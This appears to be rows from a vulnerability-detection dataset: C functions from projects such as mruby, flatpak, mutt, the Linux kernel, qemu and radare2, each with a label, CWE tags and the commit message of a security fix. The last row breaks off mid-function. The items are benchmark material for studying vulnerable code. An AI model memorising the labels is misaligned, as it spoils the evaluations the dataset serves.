func stringlengths 0–484k | target int64 0–1 | cwe listlengths 0–4 | project stringclasses 799 values | commit_id stringlengths 40 | hash float64 1.22e24–3.40e29 | size int64 1–24k | message stringlengths 0–13.3k |
---|---|---|---|---|---|---|---|
mrb_yield_with_class(mrb_state *mrb, mrb_value b, mrb_int argc, const mrb_value *argv, mrb_value self, struct RClass *c)
{
struct RProc *p;
mrb_sym mid = mrb->c->ci->mid;
mrb_callinfo *ci;
mrb_value val;
mrb_int n;
check_block(mrb, b);
ci = mrb->c->ci;
n = mrb_ci_nregs(ci);
p = mrb_proc_ptr(b);
ci = cipush(mrb, n, CINFO_SKIP, c, p, mid, 0 /* dummy */);
ci->nk = 0;
if (argc >= CALL_MAXARGS) {
ci->n = 15;
n = 3;
}
else {
ci->n = (uint8_t)argc;
n = argc + 2;
}
mrb_stack_extend(mrb, n);
mrb->c->ci->stack[0] = self;
if (ci->n == 15) {
mrb->c->ci->stack[1] = mrb_ary_new_from_values(mrb, argc, argv);
argc = 1;
}
else if (argc > 0) {
stack_copy(mrb->c->ci->stack+1, argv, argc);
}
mrb->c->ci->stack[argc+1] = mrb_nil_value(); /* clear blk */
if (MRB_PROC_CFUNC_P(p)) {
ci->cci = CINFO_DIRECT;
val = MRB_PROC_CFUNC(p)(mrb, self);
cipop(mrb);
}
else {
val = mrb_run(mrb, p, self);
}
return val;
}
| 0 |
[
"CWE-703",
"CWE-125"
] |
mruby
|
a4d97934d51cb88954cc49161dc1d151f64afb6b
| 54,608,613,763,983,400,000,000,000,000,000,000,000 | 43 |
vm.c: check if target_class is NULL (when prepended).
|
flatpak_run_add_x11_args (FlatpakBwrap *bwrap,
gboolean allowed)
{
g_autofree char *x11_socket = NULL;
const char *display;
/* Always cover /tmp/.X11-unix, that way we never see the host one in case
* we have access to the host /tmp. If you request X access we'll put the right
* thing in this anyway.
*/
flatpak_bwrap_add_args (bwrap,
"--tmpfs", "/tmp/.X11-unix",
NULL);
if (!allowed)
{
flatpak_bwrap_unset_env (bwrap, "DISPLAY");
return;
}
g_debug ("Allowing x11 access");
display = g_getenv ("DISPLAY");
if (display && display[0] == ':' && g_ascii_isdigit (display[1]))
{
const char *display_nr = &display[1];
const char *display_nr_end = display_nr;
g_autofree char *d = NULL;
while (g_ascii_isdigit (*display_nr_end))
display_nr_end++;
d = g_strndup (display_nr, display_nr_end - display_nr);
x11_socket = g_strdup_printf ("/tmp/.X11-unix/X%s", d);
flatpak_bwrap_add_args (bwrap,
"--ro-bind", x11_socket, "/tmp/.X11-unix/X99",
NULL);
flatpak_bwrap_set_env (bwrap, "DISPLAY", ":99.0", TRUE);
#ifdef ENABLE_XAUTH
g_auto(GLnxTmpfile) xauth_tmpf = { 0, };
if (glnx_open_anonymous_tmpfile_full (O_RDWR | O_CLOEXEC, "/tmp", &xauth_tmpf, NULL))
{
FILE *output = fdopen (xauth_tmpf.fd, "wb");
if (output != NULL)
{
/* fd is now owned by output, steal it from the tmpfile */
int tmp_fd = dup (glnx_steal_fd (&xauth_tmpf.fd));
if (tmp_fd != -1)
{
g_autofree char *dest = g_strdup_printf ("/run/user/%d/Xauthority", getuid ());
write_xauth (d, output);
flatpak_bwrap_add_args_data_fd (bwrap, "--ro-bind-data", tmp_fd, dest);
flatpak_bwrap_set_env (bwrap, "XAUTHORITY", dest, TRUE);
}
fclose (output);
if (tmp_fd != -1)
lseek (tmp_fd, 0, SEEK_SET);
}
}
#endif
}
else
{
flatpak_bwrap_unset_env (bwrap, "DISPLAY");
}
}
| 0 |
[
"CWE-94",
"CWE-74"
] |
flatpak
|
6d1773d2a54dde9b099043f07a2094a4f1c2f486
| 290,646,567,425,464,700,000,000,000,000,000,000,000 | 73 |
run: Convert all environment variables into bwrap arguments
This avoids some of them being filtered out by a setuid bwrap. It also
means that if they came from an untrusted source, they cannot be used
to inject arbitrary code into a non-setuid bwrap via mechanisms like
LD_PRELOAD.
Because they get bundled into a memfd or temporary file, they do not
actually appear in argv, ensuring that they remain inaccessible to
processes running under a different uid (which is important if their
values are tokens or other secrets).
Signed-off-by: Simon McVittie <[email protected]>
Part-of: https://github.com/flatpak/flatpak/security/advisories/GHSA-4ppf-fxf6-vxg2
|
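The commit message above describes moving environment data out of argv and into a memfd or temporary file so it stays invisible to processes under other uids. Below is a minimal sketch of the memfd half of that idea; it is not flatpak's actual helper, assumes Linux with glibc 2.27+ (for memfd_create), and trims error handling to the essentials.

#define _GNU_SOURCE
#include <sys/mman.h>   /* memfd_create */
#include <unistd.h>
#include <string.h>

/* Return an fd whose contents are `data`. The child can inherit a dup
 * of it, while the data never appears in argv or /proc/<pid>/cmdline. */
static int data_to_memfd(const char *data, size_t len)
{
    int fd = memfd_create("env-data", MFD_CLOEXEC);
    if (fd < 0)
        return -1;
    if (write(fd, data, len) != (ssize_t) len || lseek(fd, 0, SEEK_SET) < 0) {
        close(fd);
        return -1;
    }
    return fd;   /* caller dup2()s it to a stable fd number before exec */
}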
GF_Err fdpa_Write(GF_Box *s, GF_BitStream *bs)
{
u32 i;
GF_FDpacketBox *ptr = (GF_FDpacketBox *) s;
if (!s) return GF_BAD_PARAM;
gf_bs_write_int(bs, ptr->info.sender_current_time_present, 1);
gf_bs_write_int(bs, ptr->info.expected_residual_time_present, 1);
gf_bs_write_int(bs, ptr->info.session_close_bit, 1);
gf_bs_write_int(bs, ptr->info.object_close_bit, 1);
gf_bs_write_int(bs, 0, 4);
ptr->info.transport_object_identifier = gf_bs_read_u16(bs);
gf_bs_write_u16(bs, ptr->header_ext_count);
for (i=0; i<ptr->header_ext_count; i++) {
gf_bs_write_u8(bs, ptr->headers[i].header_extension_type);
if (ptr->headers[i].header_extension_type > 127) {
gf_bs_write_data(bs, (const char *) ptr->headers[i].content, 3);
} else {
gf_bs_write_u8(bs, ptr->headers[i].data_length ? (ptr->headers[i].data_length+2)/4 : 0);
if (ptr->headers[i].data_length) {
gf_bs_write_data(bs, ptr->headers[i].data, ptr->headers[i].data_length);
}
}
}
return GF_OK;
}
| 0 |
[
"CWE-125"
] |
gpac
|
bceb03fd2be95097a7b409ea59914f332fb6bc86
| 142,569,144,363,937,850,000,000,000,000,000,000,000 | 26 |
fixed 2 possible heap overflows (inc. #1088)
|
proxy_C_SignEncryptUpdate (CK_X_FUNCTION_LIST *self,
CK_SESSION_HANDLE handle,
CK_BYTE_PTR part,
CK_ULONG part_len,
CK_BYTE_PTR enc_part,
CK_ULONG_PTR enc_part_len)
{
State *state = (State *)self;
Mapping map;
CK_RV rv;
rv = map_session_to_real (state->px, &handle, &map, NULL);
if (rv != CKR_OK)
return rv;
return (map.funcs->C_SignEncryptUpdate) (handle, part, part_len, enc_part, enc_part_len);
}
| 0 |
[
"CWE-190"
] |
p11-kit
|
5307a1d21a50cacd06f471a873a018d23ba4b963
| 217,384,927,202,003,740,000,000,000,000,000,000,000 | 16 |
Check for arithmetic overflows before allocating
|
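The one-line message above ("Check for arithmetic overflows before allocating") refers to the classic count-times-size overflow guard. A minimal, generic sketch of the pattern, with an illustrative name rather than p11-kit's actual API:

#include <stdint.h>   /* SIZE_MAX */
#include <stdlib.h>

/* Allocate `count` elements of `size` bytes, refusing when the
 * multiplication would wrap around and undersize the buffer. */
static void *checked_alloc(size_t count, size_t size)
{
    if (size != 0 && count > SIZE_MAX / size)
        return NULL;   /* count * size would overflow size_t */
    return malloc(count * size);
}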
static void x509_fingerprint (char *s, int l, X509 * cert, const EVP_MD *(*hashfunc)(void))
{
unsigned char md[EVP_MAX_MD_SIZE];
unsigned int n;
int j;
if (!X509_digest (cert, hashfunc(), md, &n))
{
snprintf (s, l, "%s", _("[unable to calculate]"));
}
else
{
for (j = 0; j < (int) n; j++)
{
char ch[8];
snprintf (ch, 8, "%02X%s", md[j], (j % 2 ? " " : ""));
safe_strcat (s, l, ch);
}
}
}
| 0 |
[
"CWE-74"
] |
mutt
|
c547433cdf2e79191b15c6932c57f1472bfb5ff4
| 337,792,773,824,526,300,000,000,000,000,000,000,000 | 20 |
Fix STARTTLS response injection attack.
Thanks again to Damian Poddebniak and Fabian Ising from the Münster
University of Applied Sciences for reporting this issue. Their
summary in ticket 248 states the issue clearly:
We found another STARTTLS-related issue in Mutt. Unfortunately, it
affects SMTP, POP3 and IMAP.
When the server responds with its "let's do TLS now message", e.g. A
OK begin TLS\r\n in IMAP or +OK begin TLS\r\n in POP3, Mutt will
also read any data after the \r\n and save it into some internal
buffer for later processing. This is problematic, because a MITM
attacker can inject arbitrary responses.
There is a nice blogpost by Wietse Venema about a "command
injection" in postfix (http://www.postfix.org/CVE-2011-0411.html).
What we have here is the problem in reverse, i.e. not a command
injection, but a "response injection."
This commit fixes the issue by clearing the CONNECTION input buffer in
mutt_ssl_starttls().
To make backporting this fix easier, the new functions only clear the
top-level CONNECTION buffer; they don't handle nested buffering in
mutt_zstrm.c or mutt_sasl.c. However both of those wrap the
connection *after* STARTTLS, so this is currently okay. mutt_tunnel.c
occurs before connecting, but it does not perform any nesting.
|
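The fix described above works by discarding any bytes the server (or a MITM) sent after the "begin TLS" line but before the handshake, so they can never be parsed as protocol responses. A hedged sketch of that buffer-clearing idea; the struct and function names here are invented for illustration, not Mutt's real CONNECTION API:

/* Hypothetical connection with a lookahead input buffer. */
struct conn {
    char   buf[4096];
    size_t buf_len;   /* bytes read from the socket but not yet consumed */
    size_t buf_pos;
};

/* Drop buffered plaintext before starting the TLS handshake; anything
 * already read past the "begin TLS" response is attacker-controllable. */
static void conn_clear_input(struct conn *c)
{
    c->buf_len = 0;
    c->buf_pos = 0;
}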
static int ext3_commit_super(struct super_block *sb,
struct ext3_super_block *es,
int sync)
{
struct buffer_head *sbh = EXT3_SB(sb)->s_sbh;
int error = 0;
if (!sbh)
return error;
if (buffer_write_io_error(sbh)) {
/*
* Oh, dear. A previous attempt to write the
* superblock failed. This could happen because the
* USB device was yanked out. Or it could happen to
* be a transient write error and maybe the block will
* be remapped. Nothing we can do but to retry the
* write and hope for the best.
*/
ext3_msg(sb, KERN_ERR, "previous I/O error to "
"superblock detected");
clear_buffer_write_io_error(sbh);
set_buffer_uptodate(sbh);
}
/*
* If the file system is mounted read-only, don't update the
* superblock write time. This avoids updating the superblock
* write time when we are mounting the root file system
* read/only but we need to replay the journal; at that point,
* for people who are east of GMT and who make their clock
* tick in localtime for Windows bug-for-bug compatibility,
* the clock is set in the future, and this will cause e2fsck
* to complain and force a full file system check.
*/
if (!(sb->s_flags & MS_RDONLY))
es->s_wtime = cpu_to_le32(get_seconds());
es->s_free_blocks_count = cpu_to_le32(ext3_count_free_blocks(sb));
es->s_free_inodes_count = cpu_to_le32(ext3_count_free_inodes(sb));
BUFFER_TRACE(sbh, "marking dirty");
mark_buffer_dirty(sbh);
if (sync) {
error = sync_dirty_buffer(sbh);
if (buffer_write_io_error(sbh)) {
ext3_msg(sb, KERN_ERR, "I/O error while writing "
"superblock");
clear_buffer_write_io_error(sbh);
set_buffer_uptodate(sbh);
}
}
return error;
}
| 0 |
[
"CWE-20"
] |
linux
|
8d0c2d10dd72c5292eda7a06231056a4c972e4cc
| 305,901,677,406,415,840,000,000,000,000,000,000,000 | 51 |
ext3: Fix format string issues
ext3_msg() takes the printk prefix as the second parameter and the
format string as the third parameter. Two callers of ext3_msg omit the
prefix and pass the format string as the second parameter and the first
parameter to the format string as the third parameter. In both cases
this string comes from an arbitrary source. Which means the string may
contain format string characters, which will
lead to undefined and potentially harmful behavior.
The issue was introduced in commit 4cf46b67eb("ext3: Unify log messages
in ext3") and is fixed by this patch.
CC: [email protected]
Signed-off-by: Lars-Peter Clausen <[email protected]>
Signed-off-by: Jan Kara <[email protected]>
|
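The bug class above is worth a minimal illustration: an attacker-influenced string must never be passed in a format-string position. printf stands in here for ext3_msg; the shape of the fix is the same.

#include <stdio.h>

void log_untrusted(const char *untrusted)
{
    /* WRONG: if `untrusted` contains %s or %n, printf interprets it,
     * reading or writing through whatever happens to be on the stack. */
    /* printf(untrusted); */

    /* RIGHT: a constant format string; untrusted data is only an argument. */
    printf("%s\n", untrusted);
}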
static int udf_read_inode(struct inode *inode, bool hidden_inode)
{
struct buffer_head *bh = NULL;
struct fileEntry *fe;
struct extendedFileEntry *efe;
uint16_t ident;
struct udf_inode_info *iinfo = UDF_I(inode);
struct udf_sb_info *sbi = UDF_SB(inode->i_sb);
struct kernel_lb_addr *iloc = &iinfo->i_location;
unsigned int link_count;
unsigned int indirections = 0;
int bs = inode->i_sb->s_blocksize;
int ret = -EIO;
uint32_t uid, gid;
reread:
if (iloc->partitionReferenceNum >= sbi->s_partitions) {
udf_debug("partition reference: %u > logical volume partitions: %u\n",
iloc->partitionReferenceNum, sbi->s_partitions);
return -EIO;
}
if (iloc->logicalBlockNum >=
sbi->s_partmaps[iloc->partitionReferenceNum].s_partition_len) {
udf_debug("block=%u, partition=%u out of range\n",
iloc->logicalBlockNum, iloc->partitionReferenceNum);
return -EIO;
}
/*
* Set defaults, but the inode is still incomplete!
* Note: get_new_inode() sets the following on a new inode:
* i_sb = sb
* i_no = ino
* i_flags = sb->s_flags
* i_state = 0
* clean_inode(): zero fills and sets
* i_count = 1
* i_nlink = 1
* i_op = NULL;
*/
bh = udf_read_ptagged(inode->i_sb, iloc, 0, &ident);
if (!bh) {
udf_err(inode->i_sb, "(ino %lu) failed !bh\n", inode->i_ino);
return -EIO;
}
if (ident != TAG_IDENT_FE && ident != TAG_IDENT_EFE &&
ident != TAG_IDENT_USE) {
udf_err(inode->i_sb, "(ino %lu) failed ident=%u\n",
inode->i_ino, ident);
goto out;
}
fe = (struct fileEntry *)bh->b_data;
efe = (struct extendedFileEntry *)bh->b_data;
if (fe->icbTag.strategyType == cpu_to_le16(4096)) {
struct buffer_head *ibh;
ibh = udf_read_ptagged(inode->i_sb, iloc, 1, &ident);
if (ident == TAG_IDENT_IE && ibh) {
struct kernel_lb_addr loc;
struct indirectEntry *ie;
ie = (struct indirectEntry *)ibh->b_data;
loc = lelb_to_cpu(ie->indirectICB.extLocation);
if (ie->indirectICB.extLength) {
brelse(ibh);
memcpy(&iinfo->i_location, &loc,
sizeof(struct kernel_lb_addr));
if (++indirections > UDF_MAX_ICB_NESTING) {
udf_err(inode->i_sb,
"too many ICBs in ICB hierarchy"
" (max %d supported)\n",
UDF_MAX_ICB_NESTING);
goto out;
}
brelse(bh);
goto reread;
}
}
brelse(ibh);
} else if (fe->icbTag.strategyType != cpu_to_le16(4)) {
udf_err(inode->i_sb, "unsupported strategy type: %u\n",
le16_to_cpu(fe->icbTag.strategyType));
goto out;
}
if (fe->icbTag.strategyType == cpu_to_le16(4))
iinfo->i_strat4096 = 0;
else /* if (fe->icbTag.strategyType == cpu_to_le16(4096)) */
iinfo->i_strat4096 = 1;
iinfo->i_alloc_type = le16_to_cpu(fe->icbTag.flags) &
ICBTAG_FLAG_AD_MASK;
if (iinfo->i_alloc_type != ICBTAG_FLAG_AD_SHORT &&
iinfo->i_alloc_type != ICBTAG_FLAG_AD_LONG &&
iinfo->i_alloc_type != ICBTAG_FLAG_AD_IN_ICB) {
ret = -EIO;
goto out;
}
iinfo->i_unique = 0;
iinfo->i_lenEAttr = 0;
iinfo->i_lenExtents = 0;
iinfo->i_lenAlloc = 0;
iinfo->i_next_alloc_block = 0;
iinfo->i_next_alloc_goal = 0;
if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_EFE)) {
iinfo->i_efe = 1;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs -
sizeof(struct extendedFileEntry));
if (ret)
goto out;
memcpy(iinfo->i_data,
bh->b_data + sizeof(struct extendedFileEntry),
bs - sizeof(struct extendedFileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_FE)) {
iinfo->i_efe = 0;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs - sizeof(struct fileEntry));
if (ret)
goto out;
memcpy(iinfo->i_data,
bh->b_data + sizeof(struct fileEntry),
bs - sizeof(struct fileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_USE)) {
iinfo->i_efe = 0;
iinfo->i_use = 1;
iinfo->i_lenAlloc = le32_to_cpu(
((struct unallocSpaceEntry *)bh->b_data)->
lengthAllocDescs);
ret = udf_alloc_i_data(inode, bs -
sizeof(struct unallocSpaceEntry));
if (ret)
goto out;
memcpy(iinfo->i_data,
bh->b_data + sizeof(struct unallocSpaceEntry),
bs - sizeof(struct unallocSpaceEntry));
return 0;
}
ret = -EIO;
read_lock(&sbi->s_cred_lock);
uid = le32_to_cpu(fe->uid);
if (uid == UDF_INVALID_ID ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_UID_SET))
inode->i_uid = sbi->s_uid;
else
i_uid_write(inode, uid);
gid = le32_to_cpu(fe->gid);
if (gid == UDF_INVALID_ID ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_GID_SET))
inode->i_gid = sbi->s_gid;
else
i_gid_write(inode, gid);
if (fe->icbTag.fileType != ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_fmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_fmode;
else if (fe->icbTag.fileType == ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_dmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_dmode;
else
inode->i_mode = udf_convert_permissions(fe);
inode->i_mode &= ~sbi->s_umask;
iinfo->i_extraPerms = le32_to_cpu(fe->permissions) & ~FE_MAPPED_PERMS;
read_unlock(&sbi->s_cred_lock);
link_count = le16_to_cpu(fe->fileLinkCount);
if (!link_count) {
if (!hidden_inode) {
ret = -ESTALE;
goto out;
}
link_count = 1;
}
set_nlink(inode, link_count);
inode->i_size = le64_to_cpu(fe->informationLength);
iinfo->i_lenExtents = inode->i_size;
if (iinfo->i_efe == 0) {
inode->i_blocks = le64_to_cpu(fe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
udf_disk_stamp_to_time(&inode->i_atime, fe->accessTime);
udf_disk_stamp_to_time(&inode->i_mtime, fe->modificationTime);
udf_disk_stamp_to_time(&inode->i_ctime, fe->attrTime);
iinfo->i_unique = le64_to_cpu(fe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(fe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(fe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(fe->checkpoint);
iinfo->i_streamdir = 0;
iinfo->i_lenStreams = 0;
} else {
inode->i_blocks = le64_to_cpu(efe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
udf_disk_stamp_to_time(&inode->i_atime, efe->accessTime);
udf_disk_stamp_to_time(&inode->i_mtime, efe->modificationTime);
udf_disk_stamp_to_time(&iinfo->i_crtime, efe->createTime);
udf_disk_stamp_to_time(&inode->i_ctime, efe->attrTime);
iinfo->i_unique = le64_to_cpu(efe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(efe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(efe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(efe->checkpoint);
/* Named streams */
iinfo->i_streamdir = (efe->streamDirectoryICB.extLength != 0);
iinfo->i_locStreamdir =
lelb_to_cpu(efe->streamDirectoryICB.extLocation);
iinfo->i_lenStreams = le64_to_cpu(efe->objectSize);
if (iinfo->i_lenStreams >= inode->i_size)
iinfo->i_lenStreams -= inode->i_size;
else
iinfo->i_lenStreams = 0;
}
inode->i_generation = iinfo->i_unique;
/*
* Sanity check length of allocation descriptors and extended attrs to
* avoid integer overflows
*/
if (iinfo->i_lenEAttr > bs || iinfo->i_lenAlloc > bs)
goto out;
/* Now do exact checks */
if (udf_file_entry_alloc_offset(inode) + iinfo->i_lenAlloc > bs)
goto out;
/* Sanity checks for files in ICB so that we don't get confused later */
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
/*
* For file in ICB data is stored in allocation descriptor
* so sizes should match
*/
if (iinfo->i_lenAlloc != inode->i_size)
goto out;
/* File in ICB has to fit in there... */
if (inode->i_size > bs - udf_file_entry_alloc_offset(inode))
goto out;
}
switch (fe->icbTag.fileType) {
case ICBTAG_FILE_TYPE_DIRECTORY:
inode->i_op = &udf_dir_inode_operations;
inode->i_fop = &udf_dir_operations;
inode->i_mode |= S_IFDIR;
inc_nlink(inode);
break;
case ICBTAG_FILE_TYPE_REALTIME:
case ICBTAG_FILE_TYPE_REGULAR:
case ICBTAG_FILE_TYPE_UNDEF:
case ICBTAG_FILE_TYPE_VAT20:
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
inode->i_data.a_ops = &udf_adinicb_aops;
else
inode->i_data.a_ops = &udf_aops;
inode->i_op = &udf_file_inode_operations;
inode->i_fop = &udf_file_operations;
inode->i_mode |= S_IFREG;
break;
case ICBTAG_FILE_TYPE_BLOCK:
inode->i_mode |= S_IFBLK;
break;
case ICBTAG_FILE_TYPE_CHAR:
inode->i_mode |= S_IFCHR;
break;
case ICBTAG_FILE_TYPE_FIFO:
init_special_inode(inode, inode->i_mode | S_IFIFO, 0);
break;
case ICBTAG_FILE_TYPE_SOCKET:
init_special_inode(inode, inode->i_mode | S_IFSOCK, 0);
break;
case ICBTAG_FILE_TYPE_SYMLINK:
inode->i_data.a_ops = &udf_symlink_aops;
inode->i_op = &udf_symlink_inode_operations;
inode_nohighmem(inode);
inode->i_mode = S_IFLNK | 0777;
break;
case ICBTAG_FILE_TYPE_MAIN:
udf_debug("METADATA FILE-----\n");
break;
case ICBTAG_FILE_TYPE_MIRROR:
udf_debug("METADATA MIRROR FILE-----\n");
break;
case ICBTAG_FILE_TYPE_BITMAP:
udf_debug("METADATA BITMAP FILE-----\n");
break;
default:
udf_err(inode->i_sb, "(ino %lu) failed unknown file type=%u\n",
inode->i_ino, fe->icbTag.fileType);
goto out;
}
if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
struct deviceSpec *dsea =
(struct deviceSpec *)udf_get_extendedattr(inode, 12, 1);
if (dsea) {
init_special_inode(inode, inode->i_mode,
MKDEV(le32_to_cpu(dsea->majorDeviceIdent),
le32_to_cpu(dsea->minorDeviceIdent)));
/* Developer ID ??? */
} else
goto out;
}
ret = 0;
out:
brelse(bh);
return ret;
}
| 0 |
[
"CWE-476"
] |
linux
|
7fc3b7c2981bbd1047916ade327beccb90994eee
| 175,314,281,740,430,700,000,000,000,000,000,000,000 | 314 |
udf: Fix NULL ptr deref when converting from inline format
udf_expand_file_adinicb() calls directly ->writepage to write data
expanded into a page. This however misses to setup inode for writeback
properly and so we can crash on inode->i_wb dereference when submitting
page for IO like:
BUG: kernel NULL pointer dereference, address: 0000000000000158
#PF: supervisor read access in kernel mode
...
<TASK>
__folio_start_writeback+0x2ac/0x350
__block_write_full_page+0x37d/0x490
udf_expand_file_adinicb+0x255/0x400 [udf]
udf_file_write_iter+0xbe/0x1b0 [udf]
new_sync_write+0x125/0x1c0
vfs_write+0x28e/0x400
Fix the problem by marking the page dirty and going through the standard
writeback path to write the page. Strictly speaking we would not even
have to write the page but we want to catch e.g. ENOSPC errors early.
Reported-by: butt3rflyh4ck <[email protected]>
CC: [email protected]
Fixes: 52ebea749aae ("writeback: make backing_dev_info host cgroup-specific bdi_writebacks")
Reviewed-by: Christoph Hellwig <[email protected]>
Signed-off-by: Jan Kara <[email protected]>
|
ldns_zone_print(FILE *output, const ldns_zone *z)
{
ldns_zone_print_fmt(output, ldns_output_format_default, z);
}
| 0 |
[
"CWE-415"
] |
ldns
|
070b4595981f48a21cc6b4f5047fdc2d09d3da91
| 50,600,514,562,499,790,000,000,000,000,000,000,000 | 4 |
CAA and URI
|
static void do_cmd(ESPState *s)
{
uint8_t busid = esp_fifo_pop(&s->cmdfifo);
int len;
s->cmdfifo_cdb_offset--;
/* Ignore extended messages for now */
if (s->cmdfifo_cdb_offset) {
len = MIN(s->cmdfifo_cdb_offset, fifo8_num_used(&s->cmdfifo));
esp_fifo_pop_buf(&s->cmdfifo, NULL, len);
s->cmdfifo_cdb_offset = 0;
}
do_busid_cmd(s, busid);
}
| 0 |
[
"CWE-476"
] |
qemu
|
fa7505c154d4d00ad89a747be2eda556643ce00e
| 171,579,351,228,276,600,000,000,000,000,000,000,000 | 16 |
esp: don't underflow cmdfifo in do_cmd()
If the guest tries to execute a CDB when cmdfifo is not empty before the start
of the message out phase then clearing the message out phase data will cause
cmdfifo to underflow due to cmdfifo_cdb_offset being larger than the amount of
data within.
Since this can only occur by issuing deliberately incorrect instruction
sequences, ensure that the maximum length of esp_fifo_pop_buf() is limited to
the size of the data within cmdfifo.
Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
Signed-off-by: Mark Cave-Ayland <[email protected]>
Reviewed-by: Philippe Mathieu-Daudé <[email protected]>
Tested-by: Alexander Bulekov <[email protected]>
Message-Id: <[email protected]>
|
static int ext4_drop_inode(struct inode *inode)
{
int drop = generic_drop_inode(inode);
trace_ext4_drop_inode(inode, drop);
return drop;
}
| 0 |
[
"CWE-362"
] |
linux
|
ea3d7209ca01da209cda6f0dea8be9cc4b7a933b
| 316,157,308,949,287,700,000,000,000,000,000,000,000 | 7 |
ext4: fix races between page faults and hole punching
Currently, page faults and hole punching are completely unsynchronized.
This can result in page fault faulting in a page into a range that we
are punching after truncate_pagecache_range() has been called and thus
we can end up with a page mapped to disk blocks that will be shortly
freed. Filesystem corruption will shortly follow. Note that the same
race is avoided for truncate by checking page fault offset against
i_size but there isn't similar mechanism available for punching holes.
Fix the problem by creating new rw semaphore i_mmap_sem in inode and
grab it for writing over truncate, hole punching, and other functions
removing blocks from extent tree and for read over page faults. We
cannot easily use i_data_sem for this since that ranks below transaction
start and we need something ranking above it so that it can be held over
the whole truncate / hole punching operation. Also remove various
workarounds we had in the code to reduce race window when page fault
could have created pages with stale mapping information.
Signed-off-by: Jan Kara <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
|
mbfl_buffer_converter_strncat(mbfl_buffer_converter *convd, const unsigned char *p, int n)
{
mbfl_convert_filter *filter;
int (*filter_function)(int c, mbfl_convert_filter *filter);
if (convd != NULL && p != NULL) {
filter = convd->filter1;
if (filter != NULL) {
filter_function = filter->filter_function;
while (n > 0) {
if ((*filter_function)(*p++, filter) < 0) {
break;
}
n--;
}
}
}
return n;
}
| 0 |
[
"CWE-119"
] |
php-src
|
64f42c73efc58e88671ad76b6b6bc8e2b62713e1
| 330,194,490,754,083,750,000,000,000,000,000,000,000 | 20 |
Fixed bug #71906: AddressSanitizer: negative-size-param (-1) in mbfl_strcut
|
static RBinPlugin *get_plugin_from_buffer(RBin *bin, RBinFile *bf, const char *pluginname, RBuffer *buf) {
RBinPlugin *plugin = bin->force? r_bin_get_binplugin_by_name (bin, bin->force): NULL;
if (plugin) {
return plugin;
}
plugin = pluginname? r_bin_get_binplugin_by_name (bin, pluginname): NULL;
if (plugin) {
return plugin;
}
plugin = r_bin_get_binplugin_by_buffer (bin, bf, buf);
if (plugin) {
return plugin;
}
return r_bin_get_binplugin_by_name (bin, "any");
}
| 0 |
[
"CWE-125"
] |
radare2
|
193f4fe01d7f626e2ea937450f2e0c4604420e9d
| 215,812,811,139,165,700,000,000,000,000,000,000,000 | 15 |
Fix integer overflow in string search causing oobread ##crash
* Reported by @greatergoodest via huntrdev
* BountyID: 8a3dc5cb-08b3-4807-82b2-77f08c137a04
* Reproducer bfileovf
|
static int xfrm6_tunnel_rcv(struct sk_buff *skb)
{
struct net *net = dev_net(skb->dev);
const struct ipv6hdr *iph = ipv6_hdr(skb);
__be32 spi;
spi = xfrm6_tunnel_spi_lookup(net, (const xfrm_address_t *)&iph->saddr);
return xfrm6_rcv_spi(skb, IPPROTO_IPV6, spi, NULL);
}
| 0 |
[
"CWE-416"
] |
linux
|
dbb2483b2a46fbaf833cfb5deb5ed9cace9c7399
| 96,672,992,975,476,900,000,000,000,000,000,000,000 | 9 |
xfrm: clean up xfrm protocol checks
In commit 6a53b7593233 ("xfrm: check id proto in validate_tmpl()")
I introduced a check for xfrm protocol, but according to Herbert
IPSEC_PROTO_ANY should only be used as a wildcard for lookup, so
it should be removed from validate_tmpl().
And, IPSEC_PROTO_ANY is expected to only match 3 IPSec-specific
protocols, this is why xfrm_state_flush() could still miss
IPPROTO_ROUTING, which leads that those entries are left in
net->xfrm.state_all before exit net. Fix this by replacing
IPSEC_PROTO_ANY with zero.
This patch also extracts the check from validate_tmpl() to
xfrm_id_proto_valid() and uses it in parse_ipsecrequest().
With this, no other protocols should be added into xfrm.
Fixes: 6a53b7593233 ("xfrm: check id proto in validate_tmpl()")
Reported-by: [email protected]
Cc: Steffen Klassert <[email protected]>
Cc: Herbert Xu <[email protected]>
Signed-off-by: Cong Wang <[email protected]>
Acked-by: Herbert Xu <[email protected]>
Signed-off-by: Steffen Klassert <[email protected]>
|
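The message above describes extracting the protocol check into xfrm_id_proto_valid() and rejecting everything outside the IPsec set. A hedged userspace sketch of such a whitelist, using the protocols named in the message; the kernel's actual function additionally guards the IPv6 cases behind a config option.

#include <netinet/in.h>   /* IPPROTO_* constants */
#include <stdbool.h>

/* Accept only protocols that may legitimately appear in an xfrm
 * state/template; everything else (wildcards included) is rejected. */
static bool id_proto_valid(unsigned char proto)
{
    switch (proto) {
    case IPPROTO_AH:
    case IPPROTO_ESP:
    case IPPROTO_COMP:
    case IPPROTO_ROUTING:   /* IPv6 routing header */
    case IPPROTO_DSTOPTS:   /* IPv6 destination options */
        return true;
    default:
        return false;
    }
}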
write_short_policy(const short_policy_t *policy)
{
int i;
char *answer;
smartlist_t *sl = smartlist_new();
smartlist_add_asprintf(sl, "%s", policy->is_accept ? "accept " : "reject ");
for (i=0; i < policy->n_entries; i++) {
